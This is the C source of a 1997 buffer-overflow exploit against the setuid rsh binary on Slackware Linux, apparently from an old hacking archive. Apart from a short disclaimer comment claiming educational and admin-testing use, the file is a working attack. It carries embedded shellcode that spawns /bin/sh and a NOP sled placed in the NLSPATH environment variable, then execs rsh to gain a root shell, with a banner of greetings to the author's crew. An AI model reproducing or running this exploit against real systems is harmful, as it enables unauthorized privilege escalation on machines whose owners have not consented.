/* SLACKWARE RSH Buffer OverFlow -- (c) shit-head (w0nky@usa.net) 1997 Created: 8/15/97 Give thanks to Solar Designer for his su overflow, this is based on that peice of work. This is for educational purposes only, in no way am I responsible for what you do with this. This should be used by sys admins, or people who have permission of the admin to run it to see if this hole can exist on their system. If you use it for the wrong reasons then I say *tisk* on you. I will not be held responsible for your actions. This could be done with a generic overflow program, but just running this is easier. USAGE OF THIS DOES NOT GIVE YOU TECH SUPPORT SO DON'T MESSAGE ANYBODY ON IRC ABOUT THIS. */ #include #include #include char *shellcode = "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04" "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb" "\xcd\x80/" "/bin/sh" "0"; char *get_sp() { asm("movl %esp,%eax"); } #define bufsize 2048 char buffer[bufsize]; main() { int i; for (i = 0; i < bufsize - 4; i += 4) *(char **)&buffer[i] = get_sp() - 3072; memset(buffer, 0x90, 512); memcpy(&buffer[512], shellcode, strlen(shellcode)); buffer[bufsize - 1] = 0; setenv("NLSPATH", buffer, 1); system("clear"); printf("______________________________________________________________________________\n"); printf("| RSH Overflow -- (c) shit-head 1997\n"); printf("| Give props to Solar Designer for his su overflow, this is based on that.\n"); printf("|\n"); printf("| Peep's to: suid, knowy, thugzsta, you all be reet.\n"); printf("|\n"); printf("| *NOTE* I'm not responsible if you abuse this. Run only w/ premission\n"); printf("| Sending Overflow.... Done.\n"); printf("------------------------------------------------------------------------------\n"); execl("/usr/bin/rsh", "/usr/bin/rsh", NULL); } /* www.hack.co.za [2000]*/